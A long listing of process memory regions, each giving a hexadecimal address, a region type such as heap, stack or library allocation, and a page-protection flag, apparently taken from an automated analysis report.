281AC8B0000
direct allocation
page read and write
2646A2B2000
heap
page read and write
1620000
heap
page execute and read and write
FB0000
heap
page read and write
211E3334000
heap
page read and write
281AC998000
heap
page read and write
1BF50000
heap
page read and write
16CF0A50000
heap
page read and write
281ACB69000
heap
page read and write
1DFEFC8E000
heap
page read and write
2646A13A000
heap
page read and write
1D37210F000
heap
page read and write
2262D9E0000
heap
page read and write
BA02FFE000
stack
page read and write
23BCC8B0000
trusted library allocation
page read and write
29A1000
trusted library allocation
page read and write
2B3155C000
stack
page read and write
1C098C6D000
heap
page read and write
7FFD9A7E4000
trusted library allocation
page read and write
23F8AB6B000
heap
page read and write
1F235050000
trusted library allocation
page read and write
23BCCAD0000
trusted library allocation
page read and write
7FFD9A9D0000
trusted library allocation
page read and write
281AB9E6000
heap
page read and write
1BF4E000
stack
page read and write
1FCD8174000
heap
page read and write
21B78F5E000
heap
page read and write
9DC000
stack
page read and write
23699F28000
heap
page read and write
1BC40000
heap
page read and write
281AC8A0000
direct allocation
page read and write
281AC9C4000
heap
page read and write
2224EF14000
heap
page read and write
7FFE13396000
unkown
page execute and read and write
D1990FF000
stack
page read and write
1DFEFC85000
heap
page read and write
264FC1ED000
heap
page read and write
281ACA13000
heap
page read and write
19525FBD000
heap
page read and write
2224F0A0000
trusted library allocation
page read and write
22216340000
heap
page read and write
7FFD9AA70000
trusted library allocation
page read and write
2224F0E8000
trusted library allocation
page read and write
23BCD028000
heap
page read and write
281ABA5E000
heap
page read and write
7FFD9A7C4000
trusted library allocation
page read and write
7FFD9AAF4000
trusted library allocation
page read and write
246472C6000
heap
page read and write
19525F85000
heap
page read and write
281ABA0D000
heap
page read and write
16CEEF70000
heap
page read and write
264FC1D7000
heap
page read and write
16CEEF16000
heap
page read and write
20354E90000
heap
page read and write
19525FBD000
heap
page read and write
1C098C42000
heap
page read and write
21253208000
heap
page read and write
246474A0000
trusted library allocation
page read and write
281ACAB8000
heap
page read and write
23BCC939000
heap
page read and write
26469AA7000
heap
page read and write
2155AA90000
heap
page read and write
26469B3D000
heap
page read and write
C5C97DF000
stack
page read and write
281AB96D000
heap
page read and write
20354F2B000
heap
page read and write
26469AA5000
heap
page read and write
281AB96D000
heap
page read and write
21B78FC0000
heap
page read and write
21B78FCC000
heap
page read and write
281AC09B000
heap
page read and write
7FFD9A79D000
trusted library allocation
page execute and read and write
2F7FC77000
stack
page read and write
65A9E7E000
stack
page read and write
EF4CEFF000
stack
page read and write
1CE90000
trusted library allocation
page read and write
7FFDFA9C2000
unkown
page execute and read and write
1E8FFE40000
heap
page read and write
174F194A000
heap
page read and write
21B794FC000
heap
page read and write
281AB6CE000
heap
page read and write
C107AFC000
stack
page read and write
A7F6FE000
stack
page read and write
281ACB37000
heap
page read and write
281ABE3B000
heap
page read and write
7FFDFA9B2000
unkown
page execute and read and write
7FFE13212000
unkown
page execute and write copy
6284DFF000
stack
page read and write
174F1E80000
heap
page read and write
23BCC915000
heap
page read and write
47B9EFF000
stack
page read and write
12A5E0D0000
heap
page read and write
1412F924000
heap
page read and write
212531A0000
heap
page read and write
281AC960000
direct allocation
page read and write
1D37210F000
heap
page read and write
2074DAF0000
heap
page read and write
227EEE10000
heap
page read and write
E70000
heap
page read and write
2224EE43000
heap
page read and write
281AC4FC000
direct allocation
page read and write
15E849B0000
heap
page read and write
1C098C4A000
heap
page read and write
1CC34DA0000
heap
page read and write
1660000
heap
page read and write
7FFE148D3000
unkown
page readonly
281ABF13000
heap
page read and write
281AC11A000
heap
page read and write
281AC998000
heap
page read and write
281AB697000
heap
page read and write
23F474F0000
heap
page read and write
1C098BDA000
heap
page read and write
25B4F260000
heap
page read and write
25B4F0E5000
heap
page read and write
7FFD9AA90000
trusted library allocation
page read and write
19525EE0000
heap
page read and write
23F8AB81000
heap
page read and write
B3A9BDF000
stack
page read and write
281AC9FF000
heap
page read and write
215476B0000
heap
page read and write
2462FDA5000
trusted library allocation
page read and write
281AC09A000
heap
page read and write
1DFEFCA7000
heap
page read and write
26469AB5000
heap
page read and write
22249740000
heap
page read and write
174F19B3000
heap
page read and write
21B78FDE000
heap
page read and write
2224EC70000
trusted library allocation
page read and write
281ABF60000
heap
page read and write
CA863FF000
stack
page read and write
174F0EF3000
trusted library allocation
page read and write
7FFD9A7CB000
trusted library allocation
page execute and read and write
11F4000
heap
page read and write
A7F5FE000
stack
page read and write
7375CD4000
stack
page read and write
70EA1BE000
stack
page read and write
281AC8B0000
direct allocation
page read and write
2224EE21000
heap
page read and write
EF4CCFB000
stack
page read and write
70EA3BE000
stack
page read and write
281ABF09000
heap
page read and write
281AC8D0000
direct allocation
page read and write
281ABF4F000
heap
page read and write
24647317000
heap
page read and write
2A04CF50000
heap
page read and write
281ABEB9000
heap
page read and write
16CEF1A4000
heap
page read and write
2A75F5C0000
heap
page read and write
1E835A10000
heap
page read and write
7FFD9A990000
trusted library allocation
page execute and read and write
281AB66E000
heap
page read and write
23BCCB70000
heap
page read and write
2224982B000
heap
page read and write
1675000
heap
page read and write
281AC8B0000
direct allocation
page read and write
2A04CF10000
heap
page read and write
160028B0000
heap
page read and write
1B954000
heap
page read and write
2A04CF71000
heap
page read and write
133F000
heap
page read and write
24647490000
heap
page read and write
281AB604000
heap
page read and write
1DA81898000
heap
page read and write
82986FF000
stack
page read and write
25F379F4000
heap
page read and write
1FCD816D000
heap
page read and write
23671112000
heap
page read and write
281ACD7C000
heap
page read and write
281AC118000
heap
page read and write
23671109000
heap
page read and write
16CF0B0E000
heap
page read and write
21B78F60000
heap
page read and write
2F7FE7E000
stack
page read and write
1F234EB1000
trusted library allocation
page read and write
16CEF069000
heap
page read and write
3E0000
heap
page read and write
21253210000
heap
page read and write
22249902000
heap
page read and write
222162F0000
heap
page read and write
1535000
heap
page read and write
13CD000
heap
page read and write
16CEEF74000
heap
page read and write
2462FC1F000
trusted library allocation
page read and write
25BE000
stack
page read and write
1F8B2680000
heap
page read and write
1DFEFC29000
heap
page read and write
281ABF76000
heap
page read and write
1308000
heap
page read and write
24647130000
heap
page execute and read and write
281AB9EC000
heap
page read and write
281AB6C8000
heap
page read and write
281ABF24000
heap
page read and write
BA031FE000
stack
page read and write
24647391000
heap
page read and write
2538CB60000
heap
page read and write
26469B33000
heap
page read and write
7FFD9AA60000
trusted library allocation
page read and write
281AB665000
heap
page read and write
187E000
stack
page read and write
25B4F181000
heap
page read and write
7FFD9AA40000
trusted library allocation
page read and write
16CEEF25000
heap
page read and write
281AC0AE000
heap
page read and write
B30000
trusted library allocation
page read and write
1C098B30000
trusted library allocation
page read and write
7FFE0EC2F000
unkown
page execute and read and write
2646A298000
heap
page read and write
281AC9D1000
heap
page read and write
7FFDFF23C000
unkown
page execute and read and write
7FFDF8668000
unkown
page execute and write copy
281AB9CC000
heap
page read and write
65A9CFE000
stack
page read and write
21B794FC000
heap
page read and write
16CEEEEA000
heap
page read and write
7FFD9A9A0000
trusted library allocation
page read and write
2DFC7E000
stack
page read and write
2646A137000
heap
page read and write
281ACFC9000
heap
page read and write
2646A2AF000
heap
page read and write
174F1A36000
trusted library allocation
page read and write
2224F0A0000
remote allocation
page read and write
1CC34E61000
heap
page read and write
1E8FFC60000
heap
page read and write
174F1A31000
trusted library allocation
page read and write
7FFD9A870000
trusted library allocation
page execute and read and write
1C099218000
heap
page read and write
133B000
heap
page read and write
23BCC938000
heap
page read and write
2224F064000
trusted library allocation
page read and write
EC5F52C000
stack
page read and write
AF1000
stack
page read and write
24647270000
heap
page read and write
19525F81000
heap
page read and write
1B159000
heap
page read and write
125B000
heap
page read and write
7FFE0EC33000
unkown
page read and write
1DFEFC5C000
heap
page read and write
29E02EE0000
heap
page read and write
281AC04F000
heap
page read and write
174F1A63000
trusted library allocation
page read and write
2155A690000
heap
page read and write
1C94A000
stack
page read and write
7FFDFB377000
unkown
page execute and read and write
264FC1C5000
heap
page read and write
1FCD6199000
heap
page read and write
23BCCB1E000
heap
page read and write
281AB962000
heap
page read and write
7FFE0EBD0000
unkown
page readonly
2224F000000
trusted library allocation
page read and write
281AB697000
heap
page read and write
C88000
heap
page read and write
281AC0F1000
heap
page read and write
281AC11A000
heap
page read and write
10E0000
heap
page read and write
281AC123000
heap
page read and write
281AC9AB000
heap
page read and write
1B15D000
stack
page read and write
26469A30000
trusted library allocation
page read and write
70EA07E000
stack
page read and write
281ABF52000
heap
page read and write
281AC101000
heap
page read and write
2224ED30000
trusted library allocation
page read and write
281AB60B000
heap
page read and write
1C09AB84000
heap
page read and write
7FFD9A962000
trusted library allocation
page read and write
16CEEF76000
heap
page read and write
1C098C42000
heap
page read and write
281AB665000
heap
page read and write
1C2C8000
stack
page read and write
21B7ADE0000
heap
page read and write
16CEEF23000
heap
page read and write
281AC0C6000
heap
page read and write
281A9CC0000
heap
page read and write
7FFD9A7C3000
trusted library allocation
page execute and read and write
16CEEF56000
heap
page read and write
281AC10F000
heap
page read and write
264FC1CB000
heap
page read and write
1136000
heap
page read and write
2646A2B0000
heap
page read and write
1F22310B000
heap
page read and write
1D373B00000
heap
page read and write
16CEEF7D000
heap
page read and write
26469AA5000
heap
page read and write
174F19B3000
heap
page read and write
1C539000
heap
page read and write
AEC000
stack
page read and write
D198DFF000
stack
page read and write
281AB6C8000
heap
page read and write
281AC0BC000
heap
page read and write
7FFD9AA50000
trusted library allocation
page read and write
2074DB10000
heap
page read and write
FA0000
heap
page read and write
19522C80000
heap
page read and write
1FCD61B9000
heap
page read and write
1F224E42000
trusted library allocation
page read and write
281ACBF5000
heap
page read and write
1DFF3210000
direct allocation
page read and write
1DFEFC9C000
heap
page read and write
174F1E84000
heap
page read and write
2224EE55000
heap
page read and write
23E907C1000
heap
page read and write
1490000
heap
page read and write
16CEEF74000
heap
page read and write
195260E6000
heap
page read and write
1DC5D13B000
heap
page read and write
4223CFF000
unkown
page read and write
2AC0000
heap
page read and write
7FFDFAD49000
unkown
page execute and read and write
7FFD9A7DD000
trusted library allocation
page execute and read and write
281AC10E000
heap
page read and write
21B78FB4000
heap
page read and write
2224F00E000
trusted library allocation
page read and write
1F2231C0000
heap
page read and write
1412F741000
heap
page read and write
174F1A33000
trusted library allocation
page read and write
19526AFA000
heap
page read and write
281A9A60000
heap
page read and write
1FCD8163000
heap
page read and write
16CEEF72000
heap
page read and write
21B79509000
heap
page read and write
2224EE50000
heap
page read and write
21B7ADED000
heap
page read and write
19522CBA000
heap
page read and write
281AC068000
heap
page read and write
23BCC8F8000
heap
page read and write
281AC980000
direct allocation
page read and write
2D80000
heap
page read and write
BA0357D000
stack
page read and write
281AC10E000
heap
page read and write
174F0EF5000
trusted library allocation
page read and write
2A04CF5B000
heap
page read and write
1DA81BF4000
heap
page read and write
2462EA30000
trusted library allocation
page read and write
281AB9C1000
heap
page read and write
D01559F000
stack
page read and write
7FFD9A7B2000
trusted library allocation
page read and write
790000
heap
page read and write
19522CBA000
heap
page read and write
7FFD9A988000
trusted library allocation
page read and write
1C098C07000
heap
page read and write
1EC76550000
heap
page read and write
174F1B2E000
heap
page read and write
281AC53C000
direct allocation
page read and write
1FCD61CA000
heap
page read and write
7FF644871000
unkown
page execute read
17D13C51000
heap
page read and write
2224F0C2000
trusted library allocation
page read and write
1D6BCF70000
heap
page read and write
7FFDFAE9F000
unkown
page execute and write copy
281AB6CE000
heap
page read and write
281AC9E1000
heap
page read and write
281AC9C4000
heap
page read and write
21B79512000
heap
page read and write
7DFC8FC000
stack
page read and write
7FFD9AB50000
trusted library allocation
page read and write
7FFD9AAD3000
trusted library allocation
page read and write
11FECFF000
stack
page read and write
281AC092000
heap
page read and write
D01551C000
stack
page read and write
B7A775C000
stack
page read and write
10F1000
stack
page read and write
2F007FE000
unkown
page readonly
26469C20000
trusted library allocation
page read and write
1D3720F8000
heap
page read and write
1F23D3D7000
heap
page read and write
19525FE5000
heap
page read and write
281AC980000
direct allocation
page read and write
281ACEC2000
heap
page read and write
12A5E0D2000
heap
page read and write
281AB6D9000
heap
page read and write
2224F0BA000
trusted library allocation
page read and write
281AC9EA000
heap
page read and write
7FFD9ABC0000
trusted library allocation
page read and write
281AC9DC000
heap
page read and write
16CEF079000
heap
page read and write
1CA95294000
heap
page read and write
1FCD6040000
heap
page read and write
281AB93A000
heap
page read and write
7FFD9A840000
trusted library allocation
page read and write
11F0000
trusted library allocation
page read and write
9E05FFF000
stack
page read and write
B0EACFF000
stack
page read and write
1FCD67D4000
heap
page read and write
281ACD7E000
heap
page read and write
281ABF52000
heap
page read and write
281AB6CE000
heap
page read and write
1C829C30000
heap
page read and write
21B78FD2000
heap
page read and write
281ABA74000
heap
page read and write
23F8AA30000
heap
page read and write
281ABE4F000
heap
page read and write
21B7ADE3000
heap
page read and write
174F19A5000
heap
page read and write
2A04CF71000
heap
page read and write
1BB7F000
stack
page read and write
281AC033000
heap
page read and write
2646A133000
heap
page read and write
281AC07E000
heap
page read and write
25B4EF80000
heap
page read and write
14CC07E0000
heap
page read and write
24630171000
trusted library allocation
page read and write
281A9C51000
heap
page read and write
19525FC3000
heap
page read and write
22216334000
heap
page read and write
E269CFC000
stack
page read and write
281AC9EA000
heap
page read and write
281AC8A0000
direct allocation
page read and write
281AD2F0000
trusted library allocation
page read and write
2DDB4EDB000
heap
page read and write
1FCD61C6000
heap
page read and write
174F1941000
heap
page read and write
7FFD9A7ED000
trusted library allocation
page execute and read and write
23BCCB15000
heap
page read and write
281ABF24000
heap
page read and write
281ABF5C000
heap
page read and write
281ABF64000
heap
page read and write
19525FF5000
heap
page read and write
7FFD9A7A0000
trusted library allocation
page read and write
21B78FD2000
heap
page read and write
281AC9A2000
heap
page read and write
1BD4E000
stack
page read and write
7FFD9A7AD000
trusted library allocation
page execute and read and write
1F2249D0000
heap
page read and write
174F1996000
heap
page read and write
174F19B3000
heap
page read and write
281AC9C4000
heap
page read and write
7FFD9AA60000
trusted library allocation
page read and write
2224EDE0000
trusted library allocation
page read and write
1B8AC299000
heap
page read and write
1DFEFC83000
heap
page read and write
281AB6A5000
heap
page read and write
7FFD9A9F0000
trusted library allocation
page read and write
12A5E0DE000
heap
page read and write
19524F9D000
heap
page read and write
2224A000000
heap
page read and write
1C09920B000
heap
page read and write
281AC9C2000
heap
page read and write
1DFEFC1D000
heap
page read and write
F9A5EFB000
stack
page read and write
281ABA70000
heap
page read and write
264FC1ED000
heap
page read and write
2538CA41000
heap
page read and write
7FFDFAD12000
unkown
page execute and read and write
7FFD9A7A0000
trusted library allocation
page read and write
7FFE0EC6C000
unkown
page read and write
E30000
heap
page read and write
16CEEF33000
heap
page read and write
23699F79000
heap
page read and write
174F0EF6000
trusted library allocation
page read and write
16CEEF2F000
heap
page read and write
16CEF076000
heap
page read and write
7FFD9A8C0000
trusted library allocation
page execute and read and write
23BCC92F000
heap
page read and write
227EEE07000
heap
page read and write
23BCC915000
heap
page read and write
29B1000
trusted library allocation
page read and write
2DDB4EBB000
heap
page read and write
1309000
heap
page read and write
7FF644870000
unkown
page readonly
195247C6000
heap
page read and write
23699D40000
heap
page read and write
1412F920000
heap
page read and write
1C09AB8E000
heap
page read and write
1B8AC28B000
heap
page read and write
2646A2A9000
heap
page read and write
281ABF3C000
heap
page read and write
281ABF76000
heap
page read and write
20355250000
heap
page read and write
2462ECB8000
trusted library allocation
page read and write
16CEEF7D000
heap
page read and write
13B0000
heap
page read and write
281AC0BE000
heap
page read and write
7FFE1A459000
unkown
page execute and read and write
7FFDFF258000
unkown
page read and write
2224A100000
heap
page read and write
227EEE10000
heap
page read and write
281ABA23000
heap
page read and write
1952473F000
heap
page read and write
281ACB60000
heap
page read and write
F9A60FF000
stack
page read and write
16CEEF76000
heap
page read and write
174F193C000
heap
page read and write
2F01DFE000
stack
page read and write
281AB9BE000
heap
page read and write
174F19B3000
heap
page read and write
7FFD9A7BD000
trusted library allocation
page execute and read and write
281AD340000
heap
page read and write
174F19A5000
heap
page read and write
281AB6BF000
heap
page read and write
1C09AB81000
heap
page read and write
7FFD9A86C000
trusted library allocation
page execute and read and write
7FFD9A960000
trusted library allocation
page execute and read and write
281ABF48000
heap
page read and write
7FFD9A7BB000
trusted library allocation
page read and write
281AC04F000
heap
page read and write
281AC8F0000
direct allocation
page read and write
281AB6BF000
heap
page read and write
2A75F790000
heap
page read and write
1F226052000
trusted library allocation
page read and write
264FC1C5000
heap
page read and write
174F1B38000
heap
page read and write
281AB6A0000
heap
page read and write
7FFD9A950000
trusted library allocation
page read and write
281AC03E000
heap
page read and write
281AC08A000
heap
page read and write
23F47500000
heap
page read and write
1FCD632B000
heap
page read and write
1C098C54000
heap
page read and write
281AC07D000
heap
page read and write
281ACAB8000
heap
page read and write
7FFE11ED8000
unkown
page execute and read and write
21B78FC7000
heap
page read and write
281AC033000
heap
page read and write
1DFEFC24000
heap
page read and write
22249902000
heap
page read and write
281AC07E000
heap
page read and write
281AC9CE000
heap
page read and write
1C098C61000
heap
page read and write
24646FEC000
heap
page read and write
281ABF48000
heap
page read and write
16CEEF23000
heap
page read and write
7FFD9A7DD000
trusted library allocation
page execute and read and write
281AC9B7000
heap
page read and write
7FF71F11A000
unkown
page read and write
281AC9E4000
heap
page read and write
1C099227000
heap
page read and write
1EC765F5000
heap
page read and write
1450000
trusted library allocation
page read and write
7FFD9AA20000
trusted library allocation
page read and write
2684AF27000
heap
page read and write
1FCD6325000
heap
page read and write
21B78F95000
heap
page read and write
7FFD9A7DD000
trusted library allocation
page execute and read and write
281AD1A4000
heap
page read and write
1FCD67DC000
heap
page read and write
2224988D000
heap
page read and write
2D30000
heap
page read and write
2470000
heap
page execute and read and write
21B78F5A000
heap
page read and write
174F1A35000
trusted library allocation
page read and write
281AB9CC000
heap
page read and write
7FFDFADE1000
unkown
page execute and read and write
2224F11A000
trusted library allocation
page read and write
174F19CF000
heap
page read and write
281AC8A0000
direct allocation
page read and write
1DFEFC6A000
heap
page read and write
1C098B30000
trusted library allocation
page read and write
DF0000
heap
page read and write
2224ED40000
trusted library allocation
page read and write
1FCD6191000
heap
page read and write
174F1996000
heap
page read and write
7FFE1A451000
unkown
page execute and read and write
281ABF2B000
heap
page read and write
23671110000
heap
page read and write
281AC9CA000
heap
page read and write
281AB649000
heap
page read and write
174F197B000
heap
page read and write
281ABEBF000
heap
page read and write
281AC102000
heap
page read and write
20355254000
heap
page read and write
281AC0AE000
heap
page read and write
7FFDFAED1000
unkown
page execute and read and write
23BCD014000
heap
page read and write
174F1A30000
trusted library allocation
page read and write
281ABF1D000
heap
page read and write
16CEEF6E000
heap
page read and write
7C0000
heap
page read and write
1C099239000
heap
page read and write
174F1B3C000
heap
page read and write
174F1A2E000
trusted library allocation
page read and write
1C1CA000
stack
page read and write
1266000
heap
page read and write
236710E8000
heap
page read and write
281AC9C4000
heap
page read and write
281ACEC1000
heap
page read and write
1FCD6190000
heap
page read and write
7FFDFB034000
unkown
page execute and read and write
7FFD9A7B2000
trusted library allocation
page read and write
281ABF20000
heap
page read and write
16CF0B0D000
heap
page read and write
23E907C1000
heap
page read and write
16CEEED0000
heap
page read and write
1F23D096000
heap
page execute and read and write
26469A50000
heap
page read and write
23BCCB74000
heap
page read and write
1B3F6990000
heap
page read and write
281AB605000
heap
page read and write
281AC033000
heap
page read and write
174F1943000
heap
page read and write
1C099228000
heap
page read and write
222498A1000
heap
page read and write
2A1305E4000
heap
page read and write
7FFD9AAA0000
trusted library allocation
page read and write
264FC1D8000
heap
page read and write
281AC10E000
heap
page read and write
1FCD8164000
heap
page read and write
281AB6D3000
heap
page read and write
17D13C51000
heap
page read and write
195247C6000
heap
page read and write
2462D394000
heap
page read and write
2224987A000
heap
page read and write
21B79514000
heap
page read and write
281AC0BC000
heap
page read and write
1FCD614D000
heap
page read and write
21B78EC0000
trusted library allocation
page read and write
A9783AE000
stack
page read and write
2224AC41000
trusted library allocation
page read and write
7FFE148BA000
unkown
page execute and write copy
281AC9AB000
heap
page read and write
7FFD9A7CD000
trusted library allocation
page execute and read and write
1DFF1640000
heap
page read and write
1DC5D414000
heap
page read and write
23BCC921000
heap
page read and write
BA0404E000
stack
page read and write
16CEEEEA000
heap
page read and write
16CEF1A0000
heap
page read and write
1B3F6C20000
heap
page read and write
281ABE63000
heap
page read and write
281ABAAB000
heap
page read and write
23BCC921000
heap
page read and write
281AC9EE000
heap
page read and write
281AC9DC000
heap
page read and write
129A1000
trusted library allocation
page read and write
1CA95220000
heap
page read and write
281ABF64000
heap
page read and write
13CC000
heap
page read and write
1E880100000
heap
page read and write
281AC11A000
heap
page read and write
2462D0FF000
heap
page read and write
19525F04000
heap
page read and write
281AB920000
heap
page read and write
281ACDED000
heap
page read and write
281ACBF3000
heap
page read and write
1DFEFC9C000
heap
page read and write
1BEBF000
stack
page read and write
174F198E000
heap
page read and write
23699F3D000
heap
page read and write
1412F820000
heap
page read and write
1CC34E57000
heap
page read and write
2224F0A0000
remote allocation
page read and write
281AC0BE000
heap
page read and write
7FFD9A8D0000
trusted library allocation
page execute and read and write
7FFD9AA40000
trusted library allocation
page read and write
281AC9CA000
heap
page read and write
7FFD9A7A4000
trusted library allocation
page read and write
7FFD9A7E0000
trusted library allocation
page read and write
2262D9E4000
heap
page read and write
281AB6C2000
heap
page read and write
7FFD9A970000
trusted library allocation
page execute and read and write
281AC05D000
heap
page read and write
7FFD9AA00000
trusted library allocation
page read and write
21B7ADE4000
heap
page read and write
12FE8000
trusted library allocation
page read and write
281ADB30000
direct allocation
page read and write
1DFF3230000
direct allocation
page read and write
7FFE148D8000
unkown
page read and write
19525F85000
heap
page read and write
FE7519F000
stack
page read and write
129A3000
trusted library allocation
page read and write
7FFD9A8B0000
trusted library allocation
page execute and read and write
7FFD9AAB0000
trusted library allocation
page read and write
1C09921F000
heap
page read and write
1C09922E000
heap
page read and write
16CEEF27000
heap
page read and write
29E0000
heap
page execute and read and write
174F1B20000
heap
page read and write
281AC09B000
heap
page read and write
21B794F7000
heap
page read and write
19525F8C000
heap
page read and write
19522D6D000
heap
page read and write
1E8FFE47000
heap
page read and write
13063000
trusted library allocation
page read and write
281ACB69000
heap
page read and write
CA85F5C000
stack
page read and write
1F23D3E9000
heap
page read and write
1F234E91000
trusted library allocation
page read and write
19522CBA000
heap
page read and write
281ABF09000
heap
page read and write
1FCD6168000
heap
page read and write
281AB96D000
heap
page read and write
2DFBFE000
stack
page read and write
2646A29F000
heap
page read and write
174F199E000
heap
page read and write
281AC08A000
heap
page read and write
26469B15000
heap
page read and write
7FFE1320E000
unkown
page execute and read and write
281AB656000
heap
page read and write
16CEEF7D000
heap
page read and write
781000
heap
page read and write
7FFD9A932000
trusted library allocation
page read and write
C5C96DB000
stack
page read and write
16CEF076000
heap
page read and write
281ACBD1000
heap
page read and write
215476C0000
heap
page read and write
1FCD67E9000
heap
page read and write
1F2267A1000
trusted library allocation
page read and write
281AB659000
heap
page read and write
22249896000
heap
page read and write
21B78FB4000
heap
page read and write
2224A102000
heap
page read and write
16CEEF6E000
heap
page read and write
2224F040000
trusted library allocation
page read and write
23671132000
heap
page read and write
23671109000
heap
page read and write
1B960000
heap
page read and write
1B56D000
stack
page read and write
1B3F6A71000
heap
page read and write
1DFEFC22000
heap
page read and write
1FCD816E000
heap
page read and write
281ABA5E000
heap
page read and write
A977DDF000
stack
page read and write
7FFD9AB30000
trusted library allocation
page read and write
2155A7C8000
heap
page read and write
C107CFE000
stack
page read and write
8346D0C000
stack
page read and write
281ABEDC000
heap
page read and write
2DDB4E74000
heap
page read and write
16CEEF2D000
heap
page read and write
281ACA1D000
heap
page read and write
2224EC80000
trusted library allocation
page read and write
1FCD67D2000
heap
page read and write
1CA95290000
heap
page read and write
16CEF079000
heap
page read and write
7FFD9A886000
trusted library allocation
page execute and read and write
1B97E000
stack
page read and write
1C829C3B000
heap
page read and write
C8A607F000
stack
page read and write
1190000
heap
page read and write
23F47944000
heap
page read and write
281ABF64000
heap
page read and write
281AC920000
direct allocation
page read and write
7FF6448B1000
unkown
page read and write
23BCE99E000
heap
page read and write
1D372110000
heap
page read and write
1625000
heap
page read and write
7FFD9A81C000
trusted library allocation
page execute and read and write
2BE1000
trusted library allocation
page read and write
23F8AB30000
heap
page read and write
2367113E000
heap
page read and write
2462EA00000
heap
page readonly
215478E0000
heap
page read and write
12F1000
stack
page read and write
7FFD9A972000
trusted library allocation
page read and write
2646A137000
heap
page read and write
2538CB50000
heap
page read and write
1B8AC2A1000
heap
page read and write
1E835970000
heap
page read and write
1B8AC450000
heap
page read and write
CB0000
heap
page read and write
281AB6D3000
heap
page read and write
7FFDFB6C3000
unkown
page execute and read and write
1B870000
heap
page read and write
E8C8A78000
stack
page read and write
A7F1FE000
stack
page read and write
2538CA00000
heap
page read and write
23BCD01F000
heap
page read and write
1F23D0E7000
heap
page read and write
16CF0B04000
heap
page read and write
174F1B34000
heap
page read and write
211E3160000
heap
page read and write
23699E40000
heap
page read and write
19522D09000
heap
page read and write
23BCC928000
heap
page read and write
281ABF4C000
heap
page read and write
D307FE000
stack
page read and write
23F47940000
heap
page read and write
7FFDFAE51000
unkown
page execute and read and write
281ACEC2000
heap
page read and write
281ACB69000
heap
page read and write
1FCD618E000
heap
page read and write
306C000
trusted library allocation
page read and write
1F224D80000
trusted library allocation
page read and write
281ABF4C000
heap
page read and write
23E907C1000
heap
page read and write
281AC9C4000
heap
page read and write
21B794F8000
heap
page read and write
281ACB27000
heap
page read and write
1DFEFC20000
heap
page read and write
1DFF3010000
direct allocation
page read and write
1DFEFC93000
heap
page read and write
EF4CDFF000
unkown
page read and write
2074DB10000
heap
page read and write
7FFD9AB00000
trusted library allocation
page read and write
19525FE5000
heap
page read and write
14CC05A0000
heap
page read and write
19525F95000
heap
page read and write
160026E1000
heap
page read and write
E8C8CFE000
stack
page read and write
301E000
stack
page read and write
2C40000
heap
page execute and read and write
26469AA7000
heap
page read and write
DC0000
heap
page read and write
1DFEFC2E000
heap
page read and write
2A75F5E1000
heap
page read and write
16CEEEAF000
heap
page read and write
24630896000
trusted library allocation
page read and write
1FCD6322000
heap
page read and write
7FF4BAEA0000
trusted library allocation
page execute and read and write
281AB6C8000
heap
page read and write
2A75F5E1000
heap
page read and write
143F000
stack
page read and write
17D13C51000
heap
page read and write
21B7ADE2000
heap
page read and write
281ABF60000
heap
page read and write
281AC970000
direct allocation
page read and write
215478F0000
heap
page read and write
281AC9C0000
heap
page read and write
1DFEFD67000
direct allocation
page read and write
281AC9C0000
heap
page read and write
7FFE148C0000
unkown
page readonly
281ABE58000
heap
page read and write
1F2231E0000
heap
page read and write
174F194A000
heap
page read and write
1F226B46000
trusted library allocation
page read and write
2DFCFE000
stack
page read and write
7FFD9A8B6000
trusted library allocation
page execute and read and write
1332000
heap
page read and write
281ABA25000
heap
page read and write
7FF6448AE000
unkown
page write copy
281AB6A0000
heap
page read and write
16CF0B04000
heap
page read and write
2224987D000
heap
page read and write
23BCC91F000
heap
page read and write
7FFD9ABD0000
trusted library allocation
page execute and read and write
1F22314A000
heap
page read and write
1CC34F40000
heap
page read and write
7FFE0EC29000
unkown
page execute and read and write
19525F9F000
heap
page read and write
1DFEFCA9000
heap
page read and write
A9781BF000
stack
page read and write
281AB6D6000
heap
page read and write
7FFE148D9000
unkown
page readonly
2A75F550000
heap
page read and write
7FFDF8550000
unkown
page readonly
1FCD6324000
heap
page read and write
23BCCA90000
heap
page read and write
281AD1C0000
direct allocation
page read and write
7FFD9A7D4000
trusted library allocation
page read and write
1DFEFC69000
heap
page read and write
281AC8F0000
direct allocation
page read and write
281ABE6E000
heap
page read and write
281ABF1D000
heap
page read and write
281AC9DA000
heap
page read and write
1C09920A000
heap
page read and write
21B7ADF6000
heap
page read and write
1F223115000
heap
page read and write
26469B2A000
heap
page read and write
23BCC8D7000
heap
page read and write
12A5E080000
heap
page read and write
7FFD9AA80000
trusted library allocation
page read and write
6F1000
stack
page read and write
2224F0E5000
trusted library allocation
page read and write
281ABD21000
heap
page read and write
710000
heap
page read and write
174F1B3C000
heap
page read and write
281AC4C4000
direct allocation
page read and write
222498B1000
heap
page read and write
281AC9CC000
heap
page read and write
1E835D84000
heap
page read and write
23E907C1000
heap
page read and write
281AC9A1000
heap
page read and write
B3A9F7F000
stack
page read and write
12A5E0CE000
heap
page read and write
23BCC91E000
heap
page read and write
2224ED44000
trusted library allocation
page read and write
1007000
heap
page read and write
25F37A00000
heap
page read and write
1C098B60000
heap
page read and write
1F224E00000
heap
page execute and read and write
2262D9FB000
heap
page read and write
1C09AB8E000
heap
page read and write
2369BD30000
heap
page read and write
174F1A2A000
trusted library allocation
page read and write
2A75F5D8000
heap
page read and write
31B1000
trusted library allocation
page read and write
19522E70000
heap
page read and write
7FFD9A7A3000
trusted library allocation
page execute and read and write
2074DAFB000
heap
page read and write
1650000
trusted library allocation
page read and write
2F002F9000
stack
page read and write
2DFAFE000
stack
page read and write
7FFD9A866000
trusted library allocation
page read and write
1FCD61AA000
heap
page read and write
2463ED80000
trusted library allocation
page read and write
1E835940000
heap
page read and write
84DB3FF000
unkown
page read and write
CE771FF000
stack
page read and write
1FCD61CD000
heap
page read and write
1EC765F0000
heap
page read and write
7FFDFAA3E000
unkown
page execute and read and write
222498AD000
heap
page read and write
281ABA0F000
heap
page read and write
1C09923A000
heap
page read and write
C5C975E000
stack
page read and write
2A130200000
heap
page read and write
281AB6A9000
heap
page read and write
1F23D8D0000
heap
page read and write
1DFEFC9C000
heap
page read and write
1C099225000
heap
page read and write
281ACD8A000
heap
page read and write
21B794F5000
heap
page read and write
7FFD9A880000
trusted library allocation
page read and write
1FCD67C8000
heap
page read and write
7FFD9AA30000
trusted library allocation
page read and write
174F1996000
heap
page read and write
281AB926000
heap
page read and write
16CEEF5F000
heap
page read and write
780000
heap
page read and write
1360000
heap
page read and write
15E847DA000
heap
page read and write
